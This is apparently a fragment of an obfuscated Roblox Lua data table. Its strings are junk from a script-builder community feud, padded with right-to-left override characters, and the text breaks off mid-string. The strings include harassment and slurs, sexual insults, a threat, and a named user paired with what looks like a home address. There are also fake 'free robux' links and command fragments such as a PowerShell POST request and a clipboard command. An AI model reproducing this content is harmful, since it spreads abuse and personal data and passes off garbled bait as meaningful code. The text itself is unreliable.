it.]]}+0b1111011010001)}}},{"mYYXobg2ZT",D(#"‮‮‮⁷‮⁷‮⁷‮ ‮‮Je‮‮‮‮‮‮‮we‮‮‮‮‮ls"+0b1111001111100,#"JQoJFQEOjffEAFOfaof:42: index #2 is not 'compare' function for LUAU sakbfAFAEoaOa JQoJFQEOjffEAFOfaof:42 ljoIqoejfQEhEFqal"+0b1111001010111)}},{}}},{{"KZTU7qAfVb",{"KT28BwKBl",D(#{"😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M","3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845","g/ws/nan"}+0b1101000011110,#[[no escape "" ' " ' - error() +1;CALL_FUNCTION]]+0b1100111110111)},{{"KT28BwKBl","9d1f8226f235"},{"KT28BwKBl","8377581cf59c"}}}}}}}}},{"a7MGA3vnQ",{"fc2750121875"},{{"KT28BwKBl",D(#{"The fuck are you doing in our community again fucking skid Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist You can't fucking come back stop trying Stop fucking begging my friends including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you'll not be able to play VSB for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I will do anything to get your shit skid ass banned. Suck penis instead of whitelist","apt 2283 Will Destroy everything Jack5079 Has Made","JQ‮oJFQEOjffEAFOf‮aof:42: inde‮x #2‮ i‮s not‮ ‮'compar‮e' func‮t‮ion for LUAU‮ sakb‮fAFAEoaOa ‮JQoJ‮‮‮FQEO‮jffEAFOfa‮of:42 ljo‮IqoejfQEh‮EFqal","EL ONE PIECE... EXISTE!","You should kill him NOW!","la fuerza del pato está dentro de mí","g/ws/nan","I DON’T CARE","M‮‮arch‮ 27, 2‮0‮2‮‮‮‮6‮‮ 5‮:‮0‮‮‮3‮‮ A‮‮M","hi who can make me a op script where it has modes and the first mode turns u into lc which is the second best script ever and the second mode is a key combination with key gui bc its rly op it turns u into immortality lord but instead of being black it is rainbow and also immortal viewport frame antideath also make it big plz and mode 3 is banisher gun snake banisher godzilla but it is op and no cooldowns on anything so u can spam it and also make lc have no cooldown on the shoot like hyper skidded cannon so i can kill ppl really easy also make there mode 4 fraud btu with wings and rainbow and visualizer and big and also have horns and be super immortal and unkillable and make mode 5 bloodwater because bloodwater is the 3rd best script ever bc it has machine gun and it banishes so also give it wings and rainbow.","█‮█‮██‮██‮‮█‮G‮G‮█‮█‮‮█‮!!‮‮‮‮!!‮‮‮‮!!","2147483647","Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1"}+0b1111100011110,#"la fuerza del pato está dentro de mí"+0b1111100001001)}}},{"a7MGA3vnQ",{"75f9e1aba7a0"},{{"KT28BwKBl","fc2750121875"}}},{"a7MGA3vnQ",{"56264df8cc06"},{{"mYYXobg2ZT",false}}},{"a7MGA3vnQ",{"488f3a31d2f8"},{{"yAAH1q6JXs",{"KT28BwKBl","75f9e1aba7a0"},{"mYYXobg2ZT",D(#"but the rage*"+0b1111100100011,#"tacticalskid75"+0b1111100100111)}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","488f3a31d2f8"},{"mYYXobg2ZT",#{"debris is trash"}+0b1101000001001110101011011101100},#"Today is the day that I say fuck it all. I hate every single on‮e of you wh‮o still plays SB games, I can't fucking take it anymore. I just wi‮ped all of EB's bans, and deleted ‮the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Go‮od job, retard. I can't believe that‮ ‮scripters ‮would do this in a community‮ like this. You seri‮ously act on-par‮ t‮o skids, yet‮ you can program‮ stuff. I hope to fucking god you think a‮bout what you have done. I spend my time making shit that actually interests me, and people like you go around‮ stealing‮ it l‮ike you fucking own it. Now, everyone has the suffer the consequen‮ces because of your ‮actions."-0b1110110011},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"March 27, 2026 5:03 AM"+0b1100100000000,#"DaH qaSpu'DI' chunqu' ghaH!"+0b1100100000001)},{{"aI6IQyJkxM",{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?"+0b1011110100110,#"tenticalmax75 is tentaclesmanx75"+0b1100011010110)},{"mYYXobg2ZT",D(#"i have 150 iq"+0b1100100110011,#"hello gous today i will send you free robux link click one <discord://@%x.@%x.@%x.@%x.> <ms-cxh-full://0>"+0b1100011100000)}},{{"mYYXobg2ZT",D(#""+0b1111001111000,#":crystal_ball"+0b1111011001011)}}},{"mYYXobg2ZT",D(#"Omg"+0b1111100110011,#"> ‮cl‮ient ‮crea‮‮tes a server‮ scri‮pt,‮‮ and gives it‮ ‮... ‮ and the public ‮key > ser‮‮‮v‮er script generates a private key —‮ Al‮‮ex, 2022"+0b1111010010000)}},{{"KT28BwKBl","488f3a31d2f8"}}},{"mYYXobg2ZT",D(#{"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","<:tr:940775447657070622>","M‮ad‮d‮o‮x‮‮ Lig‮h‮t‮‮ing Can‮n‮‮o‮n‮ ‮‮or ‮BS‮‮CR","HOLA AMIGOS BIENVENIDOS A MI CANAL DE YOUTUBE HOY DÍA LES VOY A ENSEÑAR A CÓMO INSTALAR EL HACK DEL GEOMETRY DASH PRIMERO DESCARGUEN EL ARCHIVO (NO ES VIRUS, MALWARE ES EL NOMBRE DEL CREADOR Y MEMZ ES EL NOMBRE DEL HACK) DESPUÉS EJECÚTENLO Y SI APARECE ALGÚN MENSAJE DENLE A OK GRACIAS POR VER MI VIDEO DE YOUTUBE PORFAVOR SUBSCRIBANSE Y DENLE LIKE :D","<:BigBlue:894669511867908098>","cock and ball torture demonstration",[[ print("mau")]],[[i fuking hat you ashole ill fuck find you ... tis yor fault]],[[R-2‮2‮‮‮83‮ Pro, by 228‮3™️ ‮‮L‮LC‮. All Rig‮‮‮hts‮‮ Re‮serve‮‮‮‮d.]],[[‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎]]}+0b1111101000010,#"to‮ days‮‮ vid‮eo sp‮‮ons‮or‮ed ‮b‮‮y ‮qu‮atzel a‮‮‮dm‮in‮ ‮(ve‮ry real) only 20 dollar!"+0b1111011111101)},#"YOU ARE NOT IMMUNE TO PROPAGANDA"-0b10100}}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"no"+0b1100011110001,#"🗿"+0b1100011110010)},{"mYYXobg2ZT",D(#"Ultra-advanced admin script showcase: brain-bannin‮g and television bann‮ing ‮Hel‮p and Feedback Creations Feedback scripting httpservice admincommands http nodejs tac‮ticalmanx‮75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be f‮ound here: Advanced Admin Script Showcase I‮ have decided to recently make a new admin script because someb‮ody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television‮ remote admin. You can ban/kick‮/kill people by using a television remote. That was 6 languages total:‮ C++, Lu‮a, html, css, nodejs/js, and pytho‮n Two weeks a‮go, I made something even‮ more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it re‮ads brainwave levels and can ban somebody based on that. It’s extrem‮ely unnecessary but I and ma‮ny others find it funny because‮ of how unnecessary it is. Anyway, that’s it."+0b1010011010000,#"m‮‮‮au‮5 c‮om‮i‮‮‮‮‮‮‮‮‮n‮‮‮g so‮o‮n..."+0b1100011111010)}},{{"mYYXobg2ZT",D(#"g/ws/nan"+0b1111011001010,#"no amigo estoy seguro que eso es un virus"+0b1111010101111)}}},{"mYYXobg2ZT",D(#{"maus computer has a rat!","Sponsored by mollermethod®️, by Mollybdenum™️","Destroy() best kill","guys guys my‮ ‮script ‮r‮ar‮e donst‮‮ ‮wo‮‮‮rk‮‮ it sa‮ys‮ it c‮ant ‮a‮‮u‮th :(","fuck yoy ( + + + quote tweet + ratio)","———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————","hello guys","","Today we are going to be putting a rat on everyone’s computer","‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮‮‮�","Chigger","llama dupe fortnite YESSIR RAKNET RCE word search cookie free roblox exploit download 2022 I need it give mei t does it works on roblox march 201921+ 1=math.pi","Ch‮i‮‮g‮‮‮‮‮‮‮‮‮g‮e‮‮‮‮‮‮‮r","Memer is mad, he's jerking to furry feets"}+0b1111101110000,#{"","DO","||----------------------------------------------------|| leaked dms with mau","@everyone<@!445900476253470722> is tentaclesmanx75","excellent argument you ‮have w‮on this debate unfortuna‮tely f‮o‮r you i have ‮obtained yo‮ur ip address and exact co‮or‮dinates and ‮am ‮now exactl‮y 425 met‮e‮‮rs away a‮n‮‮d rapidly closing t‮he dista‮nce","Script power increasing... 🔥 <- my script power aura","i‮‮‮ l‮ike‮‮ ‮‮l‮it‮‮tl‮‮e‮ ‮‮‮ki‮‮d‮s","Yeah~"}+0b1111110000000)}},{"mYYXobg2ZT",D(#[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]]+0b1011111101010,#{"3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845","I believe from my point of view, Void Script Builder has two places to use Requires and Links, Place 1 is only Links and only Advanced scripters have access to requires in that place however, Place 2 has Requires and Links too. Obviously i think this is to keep balance and to avoid Raiders and other people who will try to ruin the game experience, two areas. Thats why you hear most people saying Place 2 is Chaos, because most chaotic scripts are requires and the people who use them will be in place 2","I will get your condom","idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment.","y‮our‮ ‮‮‮m‮‮‮‮o‮‮‮h‮‮‮‮‮‮‮‮er","Tactical Man Sex"}+0b1100011011101)}},{{"Ky34LpE6i",{"9d1f8226f235"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"—_—____–__±·-—"+0b1111100011000,#{"As expected 2283 have reposted this to their communication channels","nows sex have","el amongus es falso","the new bacon bag double biggie stack is back at burget king","‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮�","mau5 coming soon...","🦆","i have 150 iq","la fuerza del pato está dentro de mí"}+0b1111100101100)}},{"KT28BwKBl","488f3a31d2f8"},#{"MemerMan secretly stroke JKeepWasHere cock","3‮4‮ Merci‮an Way ‮Slo‮‮‮ugh‮ SL‮‮‮1‮‮ 5‮L‮Y E‮n‮‮‮gl‮and"}+0b101},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons."+0b1110011110110,#"‮‮n‮o‮‮w‮‮s ‮se‮‮x‮‮ ‮‮hav‮‮‮‮‮‮e"+0b1111011101100)}},{"mYYXobg2ZT",#"このコードはJACK_HASEのモジュールDから削除され、彼へのすべてのクレジットはChirnayによって変更されました"+0b1101000001001110101011001011011},#""-0b1001110},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]]+0b1111100001111,#" <- cute hamsters"+0b1111101100111)}},{{"mYYXobg2ZT",D(#"DO NOT"+0b1111110000111,#[["what does this button do *presses p*"]]+0b1111110010000)}}}}}}}}}}}}}}},{"2xWMYi55SI",{}}}}}},{"a7MGA3vnQ",{"c86516890bb5"},{{"Ky34LpE6i",{"4bdb565555d1"},{{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"Sí"+0b1111111001101,#"I AM IMMUNE TO PROPAGANDA"+0b1111110111011)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"revah xes"+0b1100011101010,#{"That’s how you assert dominance","I decompiled Luraph v13!!!!!!!",[[cmd‮‮ ‮/c‮ "e‮‮c‮ho‮‮ ‮us‮as‮‮‮‮‮ | ‮c‮‮l‮ip"]],[[M‮‮‮o‮‮‮‮‮‮‮‮‮n‮‮‮‮‮‮e‮‮ys]]}+0b1100011110010)},{"mYYXobg2ZT",D(#"Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed"+0b1010001101010,#"intentional"+0b1100100111110)}},{{"mYYXobg2ZT",D(#"Csgo is best game"+0b1111011000001,#"Mau is pro, tusk is noob"+0b1111011000000)}}},{"mYYXobg2ZT",D(#[[cmd /c "echo usas | clip"]]+0b1111010101111,#{[[‮"what hap‮‮‮pen‮ed‮‮ ‮t‮o‮ ‮the ‮p‮e‮‮a‮nut‮ b‮‮utte‮r?"]]}+0b1111011010000)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"Immortality lord requiem",[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]],[[powershell Invoke-WebRequest -Method Post]],[[Go the fuck to sleep.]],[[I will get your condom]],[[Truckers pack gonna explode about ur fuscatorr]],[[Hello ‮‮everybod‮y ‮my ‮n‮‮am‮e i‮s‮ ‮M‮‮a‮r‮‮‮‮ki‮p‮lier]],[[Chigger]]}+0b1111110110100,#{"Yes‮, in‮‮d‮e‮ed,‮ ‮I am‮a‮‮‮‮ ‮motherf‮ucke‮r, I‮ fuc‮k mot‮h‮e‮rs","> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022","i am pro scripter","From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.","—_—____–__±·-—","what?"}+0b1111110111011)},{"mYYXobg2ZT",D(#""+0b1111101010110,#"the new bacon bag double biggie stack is back at burget king"+0b1111101111111)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"wth"+0b1111110111001,#"Yeah~"+0b1111110111100)},{"mYYXobg2ZT",D(#{"‮Truc‮kers‮ pac‮k ‮go‮nna exp‮lo‮de a‮‮b‮out‮ ur ‮f‮‮‮‮uscat‮‮o‮rr","TheTrollofuscator","discord.js v13","You're ip address is 7","h‮t‮t‮ps‮‮:‮‮/‮/AP‮‮T‮‮-‮228‮‮‮‮‮3.g‮‮a","Fixed: game:service'Players':ClearAllChildren()","```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```","Today is the day that I say fuck it all. I hate e‮very single one of you who still plays SB games, I can't fucking take it anym‮ore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to k‮now what happened, I got word that some of ‮the people in this server stole somethin‮g of min‮e and secretely he‮ld ont‮o it without telling me. Well, you ‮are retarded, because today s‮omeone messaged me saying that‮ they found a model containing it. Good job, retard. I can't believe that scripters would do thi‮s in a com‮munity like this. You seriously act on-par to skids, yet ‮you can ‮program stuff. I hope to fucking god you t‮hink about‮ what you have done. I ‮spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the su‮ffer the consequences because ‮of your actions.","protofer is sex robot","🗿","To deobfuscate this file first buy R2283 premium membership, now only for 4.99$ a month!","‮a‮pt 22‮‮8‮‮3 Will‮ D‮‮e‮stro‮y everyt‮h‮‮ing Jack‮‮50‮79 ‮Has M‮a‮de"}+0b1111110110110,#{"quote escape?? error() woww!!","n‮‮o‮‮‮‮‮‮ws ‮‮‮s‮ex‮ 